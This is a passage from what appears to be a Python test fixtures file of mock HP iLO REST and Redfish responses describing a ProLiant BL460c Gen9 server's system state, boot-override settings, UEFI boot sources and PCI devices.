"Type": "HpComputerSystemExt.0.10.1",
"VirtualProfile": "Inactive",
"VirtualUUID": null,
"links": {
"BIOS": {
"href": "/rest/v1/systems/1/bios"
},
"MEMORY": {
"href": "/rest/v1/Systems/1/Memory"
},
"PCIDevices": {
"href": "/rest/v1/Systems/1/PCIDevices"
},
"PCISlots": {
"href": "/rest/v1/Systems/1/PCISlots"
},
"SecureBoot": {
"href": "/rest/v1/Systems/1/SecureBoot"
}
}
}
},
"Power": "Off",
"Processors": {
"Count": 1,
"ProcessorFamily": "Intel(R) Xeon(R) CPU E5-2609 v3 @ 1.90GHz",
"Status": {
"HealthRollUp": "OK"
}
},
"SKU": "727021-B21",
"SerialNumber": "SGH449WNL3",
"Status": {
"Health": "OK",
"State": "Disabled"
},
"SystemType": "Physical",
"Type": "ComputerSystem.0.9.6",
"UUID": "30373237-3132-4753-4834-3439574E4C33",
"links": {
"Chassis": [
{
"href": "/rest/v1/Chassis/1"
}
],
"Logs": {
"href": "/rest/v1/Systems/1/Logs"
},
"ManagedBy": [
{
"href": "/rest/v1/Managers/1"
}
],
"self": {
"href": "/rest/v1/Systems/1"
}
}
}
"""
RESP_BODY_WITH_UEFI_SHELL = """
{
"AssetTag": "",
"AvailableActions": [
{
"Action": "Reset",
"Capabilities": [
{
"AllowableValues": [
"On",
"ForceOff",
"ForceRestart",
"Nmi",
"PushPowerButton"
],
"PropertyName": "ResetType"
}
]
}
],
"Bios": {
"Current": {
"VersionString": "I36 v1.40 (01/28/2015)"
}
},
"Boot": {
"BootSourceOverrideEnabled": "Once",
"BootSourceOverrideSupported": [
"None",
"Cd",
"Hdd",
"Usb",
"Utilities",
"Diags",
"BiosSetup",
"Pxe",
"UefiShell",
"UefiTarget"
],
"BootSourceOverrideTarget": "UefiShell",
"UefiTargetBootSourceOverride": "None",
"UefiTargetBootSourceOverrideSupported": [
"HD.Emb.1.2",
"Generic.USB.1.1",
"NIC.FlexLOM.1.1.IPv4",
"NIC.FlexLOM.1.1.IPv6",
"CD.Virtual.2.1"
]
},
"Description": "Computer System View",
"HostCorrelation": {
"HostMACAddress": [
"6c:c2:17:39:fe:80",
"6c:c2:17:39:fe:88"
],
"HostName": "",
"IPAddress": [
"",
""
]
},
"IndicatorLED": "Off",
"Manufacturer": "HP",
"Memory": {
"TotalSystemMemoryGB": 16
},
"Model": "ProLiant BL460c Gen9",
"Name": "Computer System",
"Oem": {
"Hp": {
"AvailableActions": [
{
"Action": "PowerButton",
"Capabilities": [
{
"AllowableValues": [
"Press",
"PressAndHold"
],
"PropertyName": "PushType"
},
{
"AllowableValues": [
"/Oem/Hp"
],
"PropertyName": "Target"
}
]
},
{
"Action": "SystemReset",
"Capabilities": [
{
"AllowableValues": [
"ColdBoot"
],
"PropertyName": "ResetType"
},
{
"AllowableValues": [
"/Oem/Hp"
],
"PropertyName": "Target"
}
]
}
],
"Battery": [],
"Bios": {
"Backup": {
"Date": "v1.40 (01/28/2015)",
"Family": "I36",
"VersionString": "I36 v1.40 (01/28/2015)"
},
"Current": {
"Date": "01/28/2015",
"Family": "I36",
"VersionString": "I36 v1.40 (01/28/2015)"
},
"UefiClass": 2
},
"DeviceDiscoveryComplete": {
"AMSDeviceDiscovery": "NoAMS",
"SmartArrayDiscovery": "Initial",
"vAuxDeviceDiscovery": "DataIncomplete",
"vMainDeviceDiscovery": "ServerOff"
},
"PostState": "PowerOff",
"PowerAllocationLimit": 500,
"PowerAutoOn": "PowerOn",
"PowerOnDelay": "Minimum",
"PowerRegulatorMode": "Dynamic",
"PowerRegulatorModesSupported": [
"OSControl",
"Dynamic",
"Max",
"Min"
],
"ServerSignature": 0,
"Type": "HpComputerSystemExt.0.10.1",
"VirtualProfile": "Inactive",
"VirtualUUID": null,
"links": {
"BIOS": {
"href": "/rest/v1/systems/1/bios"
},
"MEMORY": {
"href": "/rest/v1/Systems/1/Memory"
},
"PCIDevices": {
"href": "/rest/v1/Systems/1/PCIDevices"
},
"PCISlots": {
"href": "/rest/v1/Systems/1/PCISlots"
},
"SecureBoot": {
"href": "/rest/v1/Systems/1/SecureBoot"
}
}
}
},
"Power": "Off",
"Processors": {
"Count": 1,
"ProcessorFamily": "Intel(R) Xeon(R) CPU E5-2609 v3 @ 1.90GHz",
"Status": {
"HealthRollUp": "OK"
}
},
"SKU": "727021-B21",
"SerialNumber": "SGH449WNL3",
"Status": {
"Health": "OK",
"State": "Disabled"
},
"SystemType": "Physical",
"Type": "ComputerSystem.0.9.6",
"UUID": "30373237-3132-4753-4834-3439574E4C33",
"links": {
"Chassis": [
{
"href": "/rest/v1/Chassis/1"
}
],
"Logs": {
"href": "/rest/v1/Systems/1/Logs"
},
"ManagedBy": [
{
"href": "/rest/v1/Managers/1"
}
],
"self": {
"href": "/rest/v1/Systems/1"
}
}
}
"""
RESP_BODY_FOR_SYSTEM_WITHOUT_BOOT = """
{
"AssetTag": "",
"AvailableActions": [
{
"Action": "Reset",
"Capabilities": [
{
"AllowableValues": [
"On",
"ForceOff",
"ForceRestart",
"Nmi",
"PushPowerButton"
],
"PropertyName": "ResetType"
}
]
}
],
"Bios": {
"Current": {
"VersionString": "I36 v1.40 (01/28/2015)"
}
},
"Description": "Computer System View",
"HostCorrelation": {
"HostMACAddress": [
"6c:c2:17:39:fe:80",
"6c:c2:17:39:fe:88"
],
"HostName": "",
"IPAddress": [
"",
""
]
},
"IndicatorLED": "Off",
"Manufacturer": "HP",
"Memory": {
"TotalSystemMemoryGB": 16
},
"Model": "ProLiant BL460c Gen9",
"Name": "Computer System",
"Oem": {
"Hp": {
"AvailableActions": [
{
"Action": "PowerButton",
"Capabilities": [
{
"AllowableValues": [
"Press",
"PressAndHold"
],
"PropertyName": "PushType"
},
{
"AllowableValues": [
"/Oem/Hp"
],
"PropertyName": "Target"
}
]
},
{
"Action": "SystemReset",
"Capabilities": [
{
"AllowableValues": [
"ColdBoot"
],
"PropertyName": "ResetType"
},
{
"AllowableValues": [
"/Oem/Hp"
],
"PropertyName": "Target"
}
]
}
],
"Battery": [],
"Bios": {
"Backup": {
"Date": "v1.40 (01/28/2015)",
"Family": "I36",
"VersionString": "I36 v1.40 (01/28/2015)"
},
"Current": {
"Date": "01/28/2015",
"Family": "I36",
"VersionString": "I36 v1.40 (01/28/2015)"
},
"UefiClass": 2
},
"DeviceDiscoveryComplete": {
"AMSDeviceDiscovery": "NoAMS",
"SmartArrayDiscovery": "Initial",
"vAuxDeviceDiscovery": "DataIncomplete",
"vMainDeviceDiscovery": "ServerOff"
},
"PostState": "PowerOff",
"PowerAllocationLimit": 500,
"PowerAutoOn": "PowerOn",
"PowerOnDelay": "Minimum",
"PowerRegulatorMode": "Dynamic",
"PowerRegulatorModesSupported": [
"OSControl",
"Dynamic",
"Max",
"Min"
],
"ServerSignature": 0,
"Type": "HpComputerSystemExt.0.10.1",
"VirtualProfile": "Inactive",
"VirtualUUID": null,
"links": {
"BIOS": {
"href": "/rest/v1/systems/1/bios"
},
"MEMORY": {
"href": "/rest/v1/Systems/1/Memory"
},
"PCIDevices": {
"href": "/rest/v1/Systems/1/PCIDevices"
},
"PCISlots": {
"href": "/rest/v1/Systems/1/PCISlots"
},
"SecureBoot": {
"href": "/rest/v1/Systems/1/SecureBoot"
}
}
}
},
"Power": "Off",
"Processors": {
"Count": 1,
"ProcessorFamily": "Intel(R) Xeon(R) CPU E5-2609 v3 @ 1.90GHz",
"Status": {
"HealthRollUp": "OK"
}
},
"SKU": "727021-B21",
"SerialNumber": "SGH449WNL3",
"Status": {
"Health": "OK",
"State": "Disabled"
},
"SystemType": "Physical",
"Type": "ComputerSystem.0.9.6",
"UUID": "30373237-3132-4753-4834-3439574E4C33",
"links": {
"Chassis": [
{
"href": "/rest/v1/Chassis/1"
}
],
"Logs": {
"href": "/rest/v1/Systems/1/Logs"
},
"ManagedBy": [
{
"href": "/rest/v1/Managers/1"
}
],
"self": {
"href": "/rest/v1/Systems/1"
}
}
}
"""
SYSTEM_WITH_CDROM_CONT = """
{
"AssetTag": "",
"AvailableActions": [
{
"Action": "Reset",
"Capabilities": [
{
"AllowableValues": [
"On",
"ForceOff",
"ForceRestart",
"Nmi",
"PushPowerButton"
],
"PropertyName": "ResetType"
}
]
}
],
"Bios": {
"Current": {
"VersionString": "I36 v1.40 (01/28/2015)"
}
},
"Boot": {
"BootSourceOverrideEnabled": "Continuous",
"BootSourceOverrideSupported": [
"None",
"Cd",
"Hdd",
"Usb",
"Utilities",
"Diags",
"BiosSetup",
"Pxe",
"UefiShell",
"UefiTarget"
],
"BootSourceOverrideTarget": "Cd",
"UefiTargetBootSourceOverride": "None",
"UefiTargetBootSourceOverrideSupported": [
"HD.Emb.1.2",
"Generic.USB.1.1",
"NIC.FlexLOM.1.1.IPv4",
"NIC.FlexLOM.1.1.IPv6",
"CD.Virtual.2.1"
]
},
"Description": "Computer System View",
"HostCorrelation": {
"HostMACAddress": [
"6c:c2:17:39:fe:80",
"6c:c2:17:39:fe:88"
],
"HostName": "",
"IPAddress": [
"",
""
]
},
"IndicatorLED": "Off",
"Manufacturer": "HP",
"Memory": {
"TotalSystemMemoryGB": 16
},
"Model": "ProLiant BL460c Gen9",
"Name": "Computer System",
"Oem": {
"Hp": {
"AvailableActions": [
{
"Action": "PowerButton",
"Capabilities": [
{
"AllowableValues": [
"Press",
"PressAndHold"
],
"PropertyName": "PushType"
},
{
"AllowableValues": [
"/Oem/Hp"
],
"PropertyName": "Target"
}
]
},
{
"Action": "SystemReset",
"Capabilities": [
{
"AllowableValues": [
"ColdBoot"
],
"PropertyName": "ResetType"
},
{
"AllowableValues": [
"/Oem/Hp"
],
"PropertyName": "Target"
}
]
}
],
"Battery": [],
"Bios": {
"Backup": {
"Date": "v1.40 (01/28/2015)",
"Family": "I36",
"VersionString": "I36 v1.40 (01/28/2015)"
},
"Current": {
"Date": "01/28/2015",
"Family": "I36",
"VersionString": "I36 v1.40 (01/28/2015)"
},
"UefiClass": 2
},
"DeviceDiscoveryComplete": {
"AMSDeviceDiscovery": "NoAMS",
"SmartArrayDiscovery": "Initial",
"vAuxDeviceDiscovery": "DataIncomplete",
"vMainDeviceDiscovery": "ServerOff"
},
"PostState": "PowerOff",
"PowerAllocationLimit": 500,
"PowerAutoOn": "PowerOn",
"PowerOnDelay": "Minimum",
"PowerRegulatorMode": "Dynamic",
"PowerRegulatorModesSupported": [
"OSControl",
"Dynamic",
"Max",
"Min"
],
"ServerSignature": 0,
"Type": "HpComputerSystemExt.0.10.1",
"VirtualProfile": "Inactive",
"VirtualUUID": null,
"links": {
"BIOS": {
"href": "/rest/v1/systems/1/bios"
},
"MEMORY": {
"href": "/rest/v1/Systems/1/Memory"
},
"PCIDevices": {
"href": "/rest/v1/Systems/1/PCIDevices"
},
"PCISlots": {
"href": "/rest/v1/Systems/1/PCISlots"
},
"SecureBoot": {
"href": "/rest/v1/Systems/1/SecureBoot"
}
}
}
},
"Power": "Off",
"Processors": {
"Count": 1,
"ProcessorFamily": "Intel(R) Xeon(R) CPU E5-2609 v3 @ 1.90GHz",
"Status": {
"HealthRollUp": "OK"
}
},
"SKU": "727021-B21",
"SerialNumber": "SGH449WNL3",
"Status": {
"Health": "OK",
"State": "Disabled"
},
"SystemType": "Physical",
"Type": "ComputerSystem.0.9.6",
"UUID": "30373237-3132-4753-4834-3439574E4C33",
"links": {
"Chassis": [
{
"href": "/rest/v1/Chassis/1"
}
],
"Logs": {
"href": "/rest/v1/Systems/1/Logs"
},
"ManagedBy": [
{
"href": "/rest/v1/Managers/1"
}
],
"self": {
"href": "/rest/v1/Systems/1"
}
}
}
"""
SYSTEM_WITH_UEFISHELL_CONT = """
{
"AssetTag": "",
"AvailableActions": [
{
"Action": "Reset",
"Capabilities": [
{
"AllowableValues": [
"On",
"ForceOff",
"ForceRestart",
"Nmi",
"PushPowerButton"
],
"PropertyName": "ResetType"
}
]
}
],
"Bios": {
"Current": {
"VersionString": "I36 v1.40 (01/28/2015)"
}
},
"Boot": {
"BootSourceOverrideEnabled": "Continuous",
"BootSourceOverrideSupported": [
"None",
"Cd",
"Hdd",
"Usb",
"Utilities",
"Diags",
"BiosSetup",
"Pxe",
"UefiShell",
"UefiTarget"
],
"BootSourceOverrideTarget": "UefiShell",
"UefiTargetBootSourceOverride": "None",
"UefiTargetBootSourceOverrideSupported": [
"HD.Emb.1.2",
"Generic.USB.1.1",
"NIC.FlexLOM.1.1.IPv4",
"NIC.FlexLOM.1.1.IPv6",
"CD.Virtual.2.1"
]
},
"Description": "Computer System View",
"HostCorrelation": {
"HostMACAddress": [
"6c:c2:17:39:fe:80",
"6c:c2:17:39:fe:88"
],
"HostName": "",
"IPAddress": [
"",
""
]
},
"IndicatorLED": "Off",
"Manufacturer": "HP",
"Memory": {
"TotalSystemMemoryGB": 16
},
"Model": "ProLiant BL460c Gen9",
"Name": "Computer System",
"Oem": {
"Hp": {
"AvailableActions": [
{
"Action": "PowerButton",
"Capabilities": [
{
"AllowableValues": [
"Press",
"PressAndHold"
],
"PropertyName": "PushType"
},
{
"AllowableValues": [
"/Oem/Hp"
],
"PropertyName": "Target"
}
]
},
{
"Action": "SystemReset",
"Capabilities": [
{
"AllowableValues": [
"ColdBoot"
],
"PropertyName": "ResetType"
},
{
"AllowableValues": [
"/Oem/Hp"
],
"PropertyName": "Target"
}
]
}
],
"Battery": [],
"Bios": {
"Backup": {
"Date": "v1.40 (01/28/2015)",
"Family": "I36",
"VersionString": "I36 v1.40 (01/28/2015)"
},
"Current": {
"Date": "01/28/2015",
"Family": "I36",
"VersionString": "I36 v1.40 (01/28/2015)"
},
"UefiClass": 2
},
"DeviceDiscoveryComplete": {
"AMSDeviceDiscovery": "NoAMS",
"SmartArrayDiscovery": "Initial",
"vAuxDeviceDiscovery": "DataIncomplete",
"vMainDeviceDiscovery": "ServerOff"
},
"PostState": "PowerOff",
"PowerAllocationLimit": 500,
"PowerAutoOn": "PowerOn",
"PowerOnDelay": "Minimum",
"PowerRegulatorMode": "Dynamic",
"PowerRegulatorModesSupported": [
"OSControl",
"Dynamic",
"Max",
"Min"
],
"ServerSignature": 0,
"Type": "HpComputerSystemExt.0.10.1",
"VirtualProfile": "Inactive",
"VirtualUUID": null,
"links": {
"BIOS": {
"href": "/rest/v1/systems/1/bios"
},
"MEMORY": {
"href": "/rest/v1/Systems/1/Memory"
},
"PCIDevices": {
"href": "/rest/v1/Systems/1/PCIDevices"
},
"PCISlots": {
"href": "/rest/v1/Systems/1/PCISlots"
},
"SecureBoot": {
"href": "/rest/v1/Systems/1/SecureBoot"
}
}
}
},
"Power": "Off",
"Processors": {
"Count": 1,
"ProcessorFamily": "Intel(R) Xeon(R) CPU E5-2609 v3 @ 1.90GHz",
"Status": {
"HealthRollUp": "OK"
}
},
"SKU": "727021-B21",
"SerialNumber": "SGH449WNL3",
"Status": {
"Health": "OK",
"State": "Disabled"
},
"SystemType": "Physical",
"Type": "ComputerSystem.0.9.6",
"UUID": "30373237-3132-4753-4834-3439574E4C33",
"links": {
"Chassis": [
{
"href": "/rest/v1/Chassis/1"
}
],
"Logs": {
"href": "/rest/v1/Systems/1/Logs"
},
"ManagedBy": [
{
"href": "/rest/v1/Managers/1"
}
],
"self": {
"href": "/rest/v1/Systems/1"
}
}
}
"""
UEFI_BOOT_DEVICE_ORDER_PXE = ['NIC.LOM.1.1.IPv4',
'NIC.LOM.1.1.IPv6',
'HD.Slot.1.2',
'Generic.USB.1.1',
'CD.Virtual.2.1',
'FD.Virtual.1.1']
UEFI_BOOT_DEVICE_ORDER_HDD = ['HD.Slot.1.2',
'NIC.LOM.1.1.IPv4',
'NIC.LOM.1.1.IPv6',
'Generic.USB.1.1',
'CD.Virtual.2.1',
'FD.Virtual.1.1']
UEFI_BOOT_DEVICE_ORDER_CD = ['CD.Virtual.2.1',
'NIC.LOM.1.1.IPv4',
'NIC.LOM.1.1.IPv6',
'Generic.USB.1.1',
'HD.Slot.1.2',
'FD.Virtual.1.1']
UEFI_BOOT_DEVICE_ORDER_ERR = ['FAKE.Virtual.2.1',
'CD.Virtual.2.1',
'NIC.LOM.1.1.IPv4',
'NIC.LOM.1.1.IPv6',
'Generic.USB.1.1',
'HD.Slot.1.2',
'FD.Virtual.1.1']
UEFI_BOOT_SOURCES_ERR = '''
[
{
"UEFIDevicePath": "PciRoot(0x0)/Pci(0x1C,0x4)/Pci(0x0,0x0)/MAC \
(3863BB43683C,0x0)/IPv4(0.0.0.0)",
"BootString": "Embedded LOM 1 Port 1 : HP Ethernet 1Gb 4-port \
331i Adapter - NIC (PXE IPv4) ",
"StructuredBootString": "NIC.LOM.1.1.IPv4",
"CorrelatableID": "PciRoot(0x0)/Pci(0x1C,0x4)/Pci(0x0,0x0)"
},
{
"UEFIDevicePath": "PciRoot(0x0)/Pci(0x1C,0x4)/Pci(0x0,0x0)/MAC\
(3863BB43683C,0x0)/IPv6(0000:0000:0000:0000:\
0000:0000:0000:0000)",
"BootString": "Embedded LOM 1 Port 1 : HP Ethernet 1Gb 4-port \
331i Adapter - NIC (PXE IPv6) ",
"StructuredBootString": "NIC.LOM.1.1.IPv6",
"CorrelatableID": "PciRoot(0x0)/Pci(0x1C,0x4)/Pci(0x0,0x0)"
},
{
"UEFIDevicePath": "PciRoot(0x0)/Pci(0x2,0x0)/Pci(0x0,0x0)/Scsi\
(0x0,0x0)",
"StructuredBootString": "HD.Slot.1.2",
"CorrelatableID": "PciRoot(0x0)/Pci(0x2,0x0)/Pci(0x0,0x0)"
},
{
"UEFIDevicePath": "UsbClass(0xFFFF,0xFFFF,0xFF,0xFF,0xFF)",
"BootString": "Generic USB Boot",
"StructuredBootString": "Generic.USB.1.1",
"CorrelatableID": "UsbClass(0xFFFF,0xFFFF,0xFF,0xFF,0xFF)"
},
{
"UEFIDevicePath": "PciRoot(0x0)/Pci(0x1D,0x0)/USB(0x0,0x0)\
/USB(0x0,0x0)",
"BootString": "iLO Virtual USB 2 : HP iLO Virtual USB CD/DVD ROM",
"StructuredBootString": "CD.Virtual.2.1",
"CorrelatableID": "PciRoot(0x0)/Pci(0x1D,0x0)/USB(0x0,0x0)/USB\
(0x0,0x0)"
},
{
"UEFIDevicePath": "PciRoot(0x0)/Pci(0x1C,0x2)/Pci(0x0,0x4)/USB\
(0x1,0x0)",
"BootString": "iLO Virtual USB 1 : HP iLO Virtual USB Key",
"StructuredBootString": "FD.Virtual.1.1",
"CorrelatableID": "PciRoot(0x0)/Pci(0x1C,0x2)/Pci(0x0,0x4)/USB(0x1,\
0x0)"
}
]
'''
UEFI_PERS_BOOT_DEVICES = ["HD.Slot.1.1",
"HD.Slot.1.2",
"NIC.LOM.1.1.iSCSI",
"NIC.LOM.1.1.IPv4",
"NIC.LOM.1.1.IPv6",
"Generic.USB.1.1",
"CD.Virtual.2.1"
]
BOOT_PERS_DEV_ORDER_MISSING = """
{
"AttributeRegistry": "HpBiosAttributeRegistryP89.1.1.00",
"BootSources": [
{
"BootString": "Slot 1 : Smart Array P840 Controller - 279.37 GiB,\
RAID 0 Logical Drive(Target:0, Lun:0)",
"CorrelatableID": "PciRoot(0x0)/Pci(0x2,0x0)/Pci(0x0,0x0)",
"StructuredBootString": "HD.Slot.1.1",
"UEFIDevicePath": "PciRoot(0x0)/Pci(0x2,0x0)/Pci(0x0,0x0)/Scsi\
(0x0,0x0)"
},
{
"BootString": "Slot 1 : Smart Array P840 Controller - 279.37 GiB,\
RAID 0 Logical Drive(Target:0, Lun:1)",
"CorrelatableID": "PciRoot(0x0)/Pci(0x2,0x0)/Pci(0x0,0x0)",
"StructuredBootString": "HD.Slot.1.2",
"UEFIDevicePath": "PciRoot(0x0)/Pci(0x2,0x0)/Pci(0x0,0x0)/Scsi\
(0x0,0x1)"
},
{
"BootString": "Embedded LOM 1 Port 1 : HP Ethernet 1Gb 4-port\
331i Adapter - NIC (PXE IPv4) ",
"CorrelatableID": "PciRoot(0x0)/Pci(0x1C,0x4)/Pci(0x0,0x0)",
"StructuredBootString": "NIC.LOM.1.1.IPv4",
"UEFIDevicePath": "PciRoot(0x0)/Pci(0x1C,0x4)/Pci(0x0,0x0)/MAC\
(C4346BB7EF30,0x0)/IPv4(0.0.0.0)"
},
{
"BootString": "Embedded LOM 1 Port 1 : HP Ethernet 1Gb 4-port\
331i Adapter - NIC (PXE IPv6) ",
"CorrelatableID": "PciRoot(0x0)/Pci(0x1C,0x4)/Pci(0x0,0x0)",
"StructuredBootString": "NIC.LOM.1.1.IPv6",
"UEFIDevicePath": "PciRoot(0x0)/Pci(0x1C,0x4)/Pci(0x0,0x0)/MAC\
(C4346BB7EF30,0x0)/IPv6(0000:0000:0000:0000:0000:0000:0000:0000)"
},
{
"BootString": "Generic USB Boot",
"CorrelatableID": "UsbClass(0xFFFF,0xFFFF,0xFF,0xFF,0xFF)",
"StructuredBootString": "Generic.USB.1.1",
"UEFIDevicePath": "UsbClass(0xFFFF,0xFFFF,0xFF,0xFF,0xFF)"
},
{
"BootString": "iLO Virtual USB 2 : HP iLO Virtual USB CD/DVD ROM",
"CorrelatableID": "PciRoot(0x0)/Pci(0x1D,0x0)/USB(0x0,0x0)/USB\
(0x0,0x0)",
"StructuredBootString": "CD.Virtual.2.1",
"UEFIDevicePath": "PciRoot(0x0)/Pci(0x1D,0x0)/USB(0x0,0x0)/USB\
(0x0,0x0)"
}
],
"DefaultBootOrder": [
"Floppy",
"Cd",
"Usb",
"EmbeddedStorage",
"PcieSlotStorage",
"EmbeddedFlexLOM",
"PcieSlotNic",
"UefiShell"
],
"Description": "This is the Server Boot Order Current Settings",
"DesiredBootDevices": [
{
"CorrelatableID": "",
"Lun": "",
"Wwn": "",
"iScsiTargetName": ""
},
{
"CorrelatableID": "",
"Lun": "",
"Wwn": "",
"iScsiTargetName": ""
}
],
"Modified": "2015-05-26T23:38:24+00:00",
"Name": "Boot Order Current Settings",
"SettingsResult": {
"ETag": "0DEA61A1609C51EED0628E3B0BC633DD",
"Messages": [
{
"MessageArgs": [
"PersistentBootConfigOrder[0"
],
"MessageID": "Base.1.0:PropertyValueNotInList"
},
{
"MessageArgs": [],
"MessageID": "Base.1.0:Success"
}
],
"Time": "2015-05-14T02:38:40+00:00"
},
"Type": "HpServerBootSettings.1.2.0",
"links": {
"BaseConfigs": {
"href": "/rest/v1/systems/1/bios/Boot/BaseConfigs"
},
"Settings": {
"href": "/rest/v1/systems/1/bios/Boot/Settings"
},
"self": {
"href": "/rest/v1/systems/1/bios/Boot"
}
}
}
"""
UEFI_BootSources = '''
[
{
"BootString": "Slot 1 : Smart Array P840 Controller - 279.37 GiB,\
RAID 0 Logical Drive(Target:0, Lun:0)",
"CorrelatableID": "PciRoot(0x0)/Pci(0x2,0x0)/Pci(0x0,0x0)",
"StructuredBootString": "HD.Slot.1.1",
"UEFIDevicePath": "PciRoot(0x0)/Pci(0x2,0x0)/Pci(0x0,0x0)/Scsi\
(0x0,0x0)"
},
{
"BootString": "Slot 1 : Smart Array P840 Controller - 279.37 GiB,\
RAID 0 Logical Drive(Target:0, Lun:1)",
"CorrelatableID": "PciRoot(0x0)/Pci(0x2,0x0)/Pci(0x0,0x0)",
"StructuredBootString": "HD.Slot.1.2",
"UEFIDevicePath": "PciRoot(0x0)/Pci(0x2,0x0)/Pci(0x0,0x0)/Scsi\
(0x0,0x1)"
},
{
"BootString": "Embedded LOM 1 Port 1 : HP Ethernet 1Gb 4-port\
331i Adapter - NIC (PXE IPv4) ",
"CorrelatableID": "PciRoot(0x0)/Pci(0x1C,0x4)/Pci(0x0,0x0)",
"StructuredBootString": "NIC.LOM.1.1.IPv4",
"UEFIDevicePath": "PciRoot(0x0)/Pci(0x1C,0x4)/Pci(0x0,0x0)/MAC\
(C4346BB7EF30,0x0)/IPv4(0.0.0.0)"
},
{
"BootString": "Embedded LOM 1 Port 1 : HP Ethernet 1Gb 2-port\
361i Adapter - NIC (iSCSI IPv4) ",
"CorrelatableID": "PciRoot(0x0)/Pci(0x2,0x3)/Pci(0x0,0x0)",
"StructuredBootString": "NIC.LOM.1.1.iSCSI",
"UEFIDevicePath": "PciRoot(0x0)/Pci(0x2,0x3)/Pci(0x0,0x0)/MAC\
(C4346BB7EF30,0x1)/IPv4(0.0.0.0)/iSCSI(iqn.2016-07.org.de\
:storage,0x1,0x0,None,None,None,TCP)"
},
{
"BootString": "Embedded LOM 1 Port 1 : HP Ethernet 1Gb 4-port\
331i Adapter - NIC (PXE IPv6) ",
"CorrelatableID": "PciRoot(0x0)/Pci(0x1C,0x4)/Pci(0x0,0x0)",
"StructuredBootString": "NIC.LOM.1.1.IPv6",
"UEFIDevicePath": "PciRoot(0x0)/Pci(0x1C,0x4)/Pci(0x0,0x0)/MAC\
(C4346BB7EF30,0x0)/IPv6(0000:0000:0000:0000:0000:0000:0000:0000)"
},
{
"BootString": "Generic USB Boot",
"CorrelatableID": "UsbClass(0xFFFF,0xFFFF,0xFF,0xFF,0xFF)",
"StructuredBootString": "Generic.USB.1.1",
"UEFIDevicePath": "UsbClass(0xFFFF,0xFFFF,0xFF,0xFF,0xFF)"
},
{
"BootString": "iLO Virtual USB 2 : HP iLO Virtual USB CD/DVD ROM",
"CorrelatableID": "PciRoot(0x0)/Pci(0x1D,0x0)/USB(0x0,0x0)/USB\
(0x0,0x0)",
"StructuredBootString": "CD.Virtual.2.1",
"UEFIDevicePath": "PciRoot(0x0)/Pci(0x1D,0x0)/USB(0x0,0x0)/USB\
(0x0,0x0)"
}
]
'''
UEFI_BOOTSOURCES_MISSING = """
{
"AttributeRegistry": "HpBiosAttributeRegistryP89.1.1.00",
"DefaultBootOrder": [
"Floppy",
"Cd",
"Usb",
"EmbeddedStorage",
"PcieSlotStorage",
"EmbeddedFlexLOM",
"PcieSlotNic",
"UefiShell"
],
"Description": "This is the Server Boot Order Current Settings",
"DesiredBootDevices": [
{
"CorrelatableID": "",
"Lun": "",
"Wwn": "",
"iScsiTargetName": ""
},
{
"CorrelatableID": "",
"Lun": "",
"Wwn": "",
"iScsiTargetName": ""
}
],
"Modified": "2015-05-26T23:38:24+00:00",
"Name": "Boot Order Current Settings",
"PersistentBootConfigOrder": [
"HD.Slot.1.1",
"HD.Slot.1.2",
"NIC.LOM.1.1.IPv4",
"NIC.LOM.1.1.IPv6",
"Generic.USB.1.1",
"CD.Virtual.2.1"
],
"SettingsResult": {
"ETag": "0DEA61A1609C51EED0628E3B0BC633DD",
"Messages": [
{
"MessageArgs": [
"PersistentBootConfigOrder[0"
],
"MessageID": "Base.1.0:PropertyValueNotInList"
},
{
"MessageArgs": [],
"MessageID": "Base.1.0:Success"
}
],
"Time": "2015-05-14T02:38:40+00:00"
},
"Type": "HpServerBootSettings.1.2.0",
"links": {
"BaseConfigs": {
"href": "/rest/v1/systems/1/bios/Boot/BaseConfigs"
},
"Settings": {
"href": "/rest/v1/systems/1/bios/Boot/Settings"
},
"self": {
"href": "/rest/v1/systems/1/bios/Boot"
}
}
}
"""
PCI_DEVICE_DETAILS_NO_GPU = """
{
"@odata.context": "/redfish/v1/$metadata#Systems/Members/1/PCIDevices",
"@odata.id": "/redfish/v1/Systems/1/PCIDevices/",
"@odata.type": "#HpServerPciDeviceCollection.HpServerPciDeviceCollection",
"Description": " PciDevices view",
"Items": [
{
"@odata.context": "/redfish/v1/$metadata#Systems/Members/\
1/PCIDevices/Members/$entity",
"@odata.id": "/redfish/v1/Systems/1/PCIDevices/6/",
"@odata.type": "#HpServerPciDevice.1.0.0.HpServerPciDevice",
"BusNumber": 132,
"ClassCode": 6,
"DeviceID": 34631,
"DeviceInstance": 2,
"DeviceLocation": "PCI Slot",
"DeviceNumber": 0,
"DeviceSubInstance": 1,
"DeviceType": "Other PCI Device",
"FunctionNumber": 0,
"Id": "6",
"Name": "PCIe Controller",
"SegmentNumber": 0,
"StructuredName": "PCI.Slot.2.1",
"SubclassCode": 4,
"SubsystemDeviceID": 34631,
"SubsystemVendorID": 4277,
"Type": "HpServerPciDevice.1.0.0",
"UEFIDevicePath": "PciRoot(0x1)/Pci(0x3,0x0)/Pci(0x0,0x0)",
"VendorID": 4277,
"links": {
"self": {
"href": "/rest/v1/Systems/1/PCIDevices/6"
}
}
}
]
}
"""
PCI_GPU_LIST = """
[
{
"@odata.context": "/redfish/v1/$metadata#Systems/Members/1\
/PCIDevices/Members/$entity",
"@odata.id": "/redfish/v1/Systems/1/PCIDevices/6/",
"@odata.type": "#HpServerPciDevice.1.0.0.HpServerPciDevice",
"BusNumber": 5,
"ClassCode": 3,
"DeviceID": 26528,
"DeviceInstance": 3,
"DeviceLocation": "PCI Slot",
"DeviceNumber": 0,
"DeviceSubInstance": 1,
"DeviceType": "Other PCI Device",
"FunctionNumber": 0,
"Id": "6",
"Name": "HAWAII XTGL",
"SegmentNumber": 0,
"StructuredName": "PCI.Slot.3.1",
"SubclassCode": 128,
"SubsystemDeviceID": 821,
"SubsystemVendorID": 4098,
"Type": "HpServerPciDevice.1.0.0",
"UEFIDevicePath": "PciRoot(0x0)/Pci(0x2,0x0)/Pci(0x0,0x0)/\
Pci(0x8,0x0)/Pci(0x0,0x0)",
"VendorID": 4098,
"links": {
"self": {
"href": "/rest/v1/Systems/1/PCIDevices/6"
}
}
}
]
"""
PCI_DEVICE_DETAILS = """
{
"@odata.context": "/redfish/v1/$metadata#Systems/Members/1/PCIDevices",
"@odata.id": "/redfish/v1/Systems/1/PCIDevices/",
"@odata.type": "#HpServerPciDeviceCollection.HpServerPciDeviceCollection",
"Description": " PciDevices view",
"Items": [
{
"@odata.context": "/redfish/v1/$metadata#Systems/Members/\
1/PCIDevices/Members/$entity",
"@odata.id": "/redfish/v1/Systems/1/PCIDevices/6/",
"@odata.type": "#HpServerPciDevice.1.0.0.HpServerPciDevice",
